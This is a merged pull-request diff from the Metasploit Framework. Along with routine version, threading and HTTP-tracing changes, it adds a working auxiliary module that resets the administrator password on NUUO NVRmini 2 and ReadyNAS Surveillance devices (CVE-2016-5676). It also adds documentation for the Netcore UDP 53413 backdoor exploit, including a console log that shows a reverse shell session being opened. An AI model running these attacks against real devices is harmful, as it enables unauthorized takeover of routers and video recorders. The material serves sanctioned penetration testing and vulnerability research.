Merge pull request #31 from rapid7/master

aa

Author: Pedro Ribeiro

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.12.17)
+    metasploit-framework (4.12.18)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)

documentation/modules/exploit/linux/misc/netcore_udp_53413_backdoor.md

@@ -0,0 +1,94 @@
+### Vulnerable Devices
+Trend Micro lists "almost all" models as being vulnerable in August 2014.
+
+Vulnerable AND Exploitable:
+
+1. Netcore NI360 second-generation
+ 
+Vulnerable, but not Exploitable via this module (details later):
+
+1. Netis WF2414 firmware V1.4.27001
+
+### Lab Emulation
+1. Install qemu
+2. Download and install mipsel.  Please read the [tutorial](https://people.debian.org/%7Eaurel32/qemu/mipsel/README.txt)
+3. Starts the mipsel lab
+ 1. `qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net user,hostfwd=tcp::22222-:22,hostfwd=udp::53413-:53413`
+4. Put [vuln_squashfs-root.tar.gz](https://github.com/rapid7/metasploit-framework/files/267284/vuln_squashfs-root.tar.gz) to mipsel lab, extract it.
+ 1. `scp -P22222 vuln_squashfs-root.tar.gz [email protected]:/root`
+ 2. `tar xvf vuln_squashfs-root.tar.gz`
+5. Run vuln programs.
+ 1. `cd nw614 && chroot . /bin/igdmptd`
+
+## Verification Steps
+
+  1. Install the emulator/hardware
+  2. Start msfconsole
+  3. Do: `use exploits/linux/misc/netcore_udp_53413_backdoor`
+  4. Do: `set RHOST <ip>`
+  5. Do: `check`
+  6. Do: `exploit`
+  7. You should get a shell.
+
+## Exploitability
+
+As previously noted, some modules are vulnerable, but not currently exploitable via Metasploit.
+During [testing](https://github.com/rapid7/metasploit-framework/pull/6880#issuecomment-231597626) it was discovered that some modules implement an echo command that does not honor -ne.  While it may be possible to still execute a shell, further investigation would need to be conducted.
+In these cases, it should be possible to use [other scripts](https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py) to act as a fake interactive shell.
+
+## Scenarios
+
+The following is an example of a vulnerable AND EXPLOITABLE router.
+
+```
+use exploits/linux/misc/netcore_udp_53413_backdoor
+msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
+RHOST => 192.168.1.1
+msf exploit(netcore_udp_53413_backdoor) > check
+[+] The target is vulnerable.
+msf exploit(netcore_udp_53413_backdoor) > run
+
+[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Exploiting...
+[*] Command Stager progress -  12.54% done (196/1563 bytes)
+[*] Command Stager progress -  25.08% done (392/1563 bytes)
+[*] Command Stager progress -  37.62% done (588/1563 bytes)
+[*] Command Stager progress -  50.16% done (784/1563 bytes)
+[*] Command Stager progress -  62.70% done (980/1563 bytes)
+[*] Command Stager progress -  75.24% done (1176/1563 bytes)
+[*] Command Stager progress -  87.78% done (1372/1563 bytes)
+[*] Command Stager progress - 100.00% done (1563/1563 bytes)
+[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:54180) at 2016-05-16 00:52:43 -0500
+
+pwd
+/
+ls
+bin
+cfg
+dev
+etc
+lib
+linuxrc
+log
+proc
+sbin
+sh
+sys
+tmp
+usr
+var
+web
+```
+
+The following is an example of a vulnerable but NOT expoitable router.
+
+```
+msf > use exploits/linux/misc/netcore_udp_53413_backdoor
+msf exploit(netcore_udp_53413_backdoor) > set rhost 192.168.1.1
+rhost => 192.168.1.1
+msf exploit(netcore_udp_53413_backdoor) > check
+
+[+] Backdoor Unlocked
+[*] Router backdoor triggered, but non-exploitable echo command detected.  Not currently exploitable with Metasploit.
+[*] The target service is running, but could not be validated.
+```

lib/metasploit/framework/version.rb

@@ -30,7 +30,7 @@ def self.get_hash
         end
       end
 
-      VERSION = "4.12.17"
+      VERSION = "4.12.18"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

lib/msf/base/sessions/command_shell.rb

@@ -50,6 +50,7 @@ def self.type
   def initialize(*args)
     self.platform ||= ""
     self.arch     ||= ""
+    self.max_threads = 1
     super
   end
 
@@ -235,6 +236,7 @@ def reset_ring_sequence
 
   attr_accessor :arch
   attr_accessor :platform
+  attr_accessor :max_threads
 
 protected
 

lib/msf/base/sessions/meterpreter.rb

@@ -69,6 +69,9 @@ def initialize(rstream, opts={})
     # Don't pass the datastore into the init_meterpreter method
     opts.delete(:datastore)
 
+    # Assume by default that 10 threads is a safe number for this session
+    self.max_threads ||= 10
+
     #
     # Initialize the meterpreter client
     #
@@ -323,6 +326,27 @@ def update_session_info
     username = self.sys.config.getuid
     sysinfo  = self.sys.config.sysinfo
 
+    self.platform =
+      self.sys.config.sysinfo["Architecture"].downcase + '/' +
+      self.platform.split('/')[0] +'/' +
+      case self.sys.config.sysinfo['OS']
+      when /windows/i
+        Msf::Module::Platform::Windows
+      when /darwin/i
+        Msf::Module::Platform::OSX
+      when /freebsd/i
+        Msf::Module::Platform::FreeBSD
+      when /netbsd/i
+        Msf::Module::Platform::NetBSD
+      when /openbsd/i
+        Msf::Module::Platform::OpenBSD
+      when /sunos/i
+        Msf::Module::Platform::Solaris
+      else
+        Msf::Module::Platform::Linux
+      end.realname.downcase
+
+
     safe_info = "#{username} @ #{sysinfo['Computer']}"
     safe_info.force_encoding("ASCII-8BIT") if safe_info.respond_to?(:force_encoding)
     # Should probably be using Rex::Text.ascii_safe_hex but leave
@@ -474,6 +498,7 @@ def create(param)
   attr_accessor :skip_ssl
   attr_accessor :skip_cleanup
   attr_accessor :target_id
+  attr_accessor :max_threads
 
 protected
 

lib/msf/core/exploit/http/client.rb

@@ -54,7 +54,8 @@ def initialize(info = {})
         Opt::SSLVersion,
         OptBool.new('FingerprintCheck', [ false, 'Conduct a pre-exploit fingerprint verification', true]),
         OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']),
-        OptInt.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout'])
+        OptInt.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout']),
+        OptBool.new('HttpTrace', [false, 'Show the raw HTTP requests and responses', false])
       ], self.class
     )
 
@@ -324,9 +325,30 @@ def send_request_raw(opts={}, timeout = 20)
     begin
       c = connect(opts)
       r = c.request_raw(opts)
-      c.send_recv(r, actual_timeout)
-    rescue ::Errno::EPIPE, ::Timeout::Error
+
+      if datastore['HttpTrace']
+        print_line('#' * 20)
+        print_line('# Request:')
+        print_line('#' * 20)
+        print_line(r.to_s)
+      end
+
+      res = c.send_recv(r, actual_timeout)
+
+      if datastore['HttpTrace']
+        print_line('#' * 20)
+        print_line('# Response:')
+        print_line('#' * 20)
+        print_line(res.to_s)
+      end
+
+      res
+    rescue ::Errno::EPIPE, ::Timeout::Error => e
+      print_line(e.message) if datastore['HttpTrace']
       nil
+    rescue ::Exception => e
+      print_line(e.message) if datastore['HttpTrace']
+      raise e
     end
   end
 
@@ -343,12 +365,35 @@ def send_request_cgi(opts={}, timeout = 20)
       actual_timeout =  opts[:timeout] || timeout
     end
 
+    print_line("*" * 20) if datastore['HttpTrace']
+
     begin
       c = connect(opts)
       r = c.request_cgi(opts)
-      c.send_recv(r, actual_timeout)
-    rescue ::Errno::EPIPE, ::Timeout::Error
+
+      if datastore['HttpTrace']
+        print_line('#' * 20)
+        print_line('# Request:')
+        print_line('#' * 20)
+        print_line(r.to_s)
+      end
+
+      res = c.send_recv(r, actual_timeout)
+
+      if datastore['HttpTrace']
+        print_line('#' * 20)
+        print_line('# Response:')
+        print_line('#' * 20)
+        print_line(res.to_s)
+      end
+
+      res
+    rescue ::Errno::EPIPE, ::Timeout::Error => e
+      print_line(e.message) if datastore['HttpTrace']
       nil
+    rescue ::Exception => e
+      print_line(e.message) if datastore['HttpTrace']
+      raise e
     end
   end
 

lib/msf/core/module/platform.rb

@@ -409,6 +409,10 @@ class V10
       Rank = 700
       Alias = "10"
     end
+    class V11
+      Rank = 800
+      Alias = "11"
+    end
   end
 
   #

modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb

@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Default Configuration Load and Administrator Password Reset',
+      'Description' => %q{
+        The NVRmini 2 Network Video Recorded and the ReadyNAS Surveillance application are vulnerable
+        to an administrator password reset on the exposed web management interface.
+        Note that this only works for unauthenticated attackers in earlier versions of the Nuuo firmware
+        (before v1.7.6), otherwise you need an administrative user password.
+        This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance.
+        It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested
+        in those devices.
+      },
+      'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2016-5676'],
+          ['US-CERT-VU', '856152'],
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt'],
+          ['URL', 'http://seclists.org/bugtraq/2016/Aug/45']
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Aug 4 2016'))
+
+    register_options(
+      [
+        Opt::RPORT(8081),
+        OptString.new('TARGETURI', [true,  "Application path", '/']),
+        OptString.new('USERNAME', [false, 'The username to login as', 'admin']),
+        OptString.new('PASSWORD', [false, 'Password for the specified username', 'admin']),
+      ], self.class)
+  end
+
+
+  def run
+    res = send_request_cgi({
+        'uri' => normalize_uri(datastore['TARGETURI'], "cgi-bin", "cgi_system"),
+        'vars_get' => { 'cmd' => "loaddefconfig" }
+    })
+
+    if res && res.code == 401
+      res = send_request_cgi({
+              'method' => 'POST',
+              'uri' => normalize_uri(datastore['TARGETURI'], "login.php"),
+              'vars_post' => {
+                'user' => datastore['USERNAME'],
+                'pass' => datastore['PASSWORD'],
+                'submit' => "Login"
+              }
+      })
+      if res && (res.code == 200 || res.code == 302)
+        cookie = res.get_cookies
+      else
+        fail_with(Failure::Unknown, "#{peer} - A valid username / password is needed to reset the device.")
+      end
+      res = send_request_cgi({
+          'uri' => normalize_uri(datastore['TARGETURI'], "cgi-bin", "cgi_system"),
+          'cookie' => cookie,
+          'vars_get' => { 'cmd' => "loaddefconfig" }
+      })
+    end
+
+    if res && res.code == 200 && res.body.to_s =~ /load default configuration ok/
+      print_good("#{peer} - Device has been reset to the default configuration.")
+    else
+      print_error("#{peer} - Failed to reset device.")
+    end
+  end
+end